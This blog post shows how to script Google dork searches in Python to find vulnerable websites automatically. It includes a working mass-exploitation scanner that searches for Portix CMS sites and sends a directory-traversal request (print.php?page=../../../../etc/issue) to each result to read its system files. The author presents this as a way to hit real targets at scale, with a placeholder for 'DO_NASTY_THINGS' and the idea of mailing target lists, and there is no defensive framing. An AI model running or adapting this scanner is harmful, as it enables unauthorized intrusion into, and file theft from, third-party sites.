[PYTHON] write your vulnerability scanner using google
Today a lot of google dorks come out, but it's more convenient if you can use them in an automatic way:Using google search engine to find vulnerable targets, executing exploits commands then sending a mail with the list of targets for example.
The python language can be really handy for such matter:
First I imagine and write my google search interface. So I want to have an interface like this:
#!/usr/bin/python
import google
for r in google.search(<GOOGLE_DORK>):
# <DO_NASTY_THINGS>
print 'title:', r.title
print 'url:', r.url
print 'desc:', r.desc
print '---'
The code which implement the interface use the xgoogle library (http://www.catonmat.net/blog/python-lib ... le-search/) which deal with google engine part. The file google.py implements the interface:from xgoogle.search import GoogleSearch, SearchError
class result:
def __init__(self, title, desc, url):
self.title = title
self.desc = desc
self.url = url
def __str__(self):
return 'title: %s\nurl: %s\ndesc: %s' % (self.title, self.url, self.desc)
class results:
def __init__(self, gs):
self.gs = gs
self.res = gs.get_results()
def __iter__(self):
self._it = 0
return self
def next(self):
if self._it >= len(self.res):
try:
self.res = self.gs.get_results()
except:
raise StopIteration
self._it = 0
if self._it < len(self.res):
r = result(
self.res[self._it].title.encode('utf8'),
self.res[self._it].desc.encode('utf8'),
self.res[self._it].url.encode('utf8'))
self._it += 1
return r
def search(word):
gs = GoogleSearch(word, random_agent=True)
gs.results_per_page = 10
return results(gs)
You can now write your own easily, for instance, this is the code to build a Portix CMS vulnerability scanner: http://www.exploit-db.com/exploits/17515/#!/usr/bin/python
import re
import google
import url_util
def get_base(url):
return re.search('^(\S+)livriel.php\?livriel=', url).groups()[0]
url_analysed = []
for r in google.search('inurl:livriel.php?livriel='):
try:
url_base = get_base(r.url)
if url_base in url_analysed:
continue
url_analysed.append(url_base)
url = url_base + '/print.php?page=../../../../../../../../../../etc/issue'
soup = url_util.Request().get_soup(url)
if soup.prettify().find('failed to open stream:') >= 0:
continue
except:
continue
print url_base
print soup.contents[len(soup.contents)-1]
print '---'
The url_util has been wrote by myself. I create my own interface:
- to reduce the code as much as possible
- to make an abstraction to the library used behind, so I don't care about what library I use, and I don't need to remember how to use it, because I use my own interface. It's easier to remember how to use your own code, you have less "WTF ?" or "What the hell does this code do ?"
0 Comments:
Post a Comment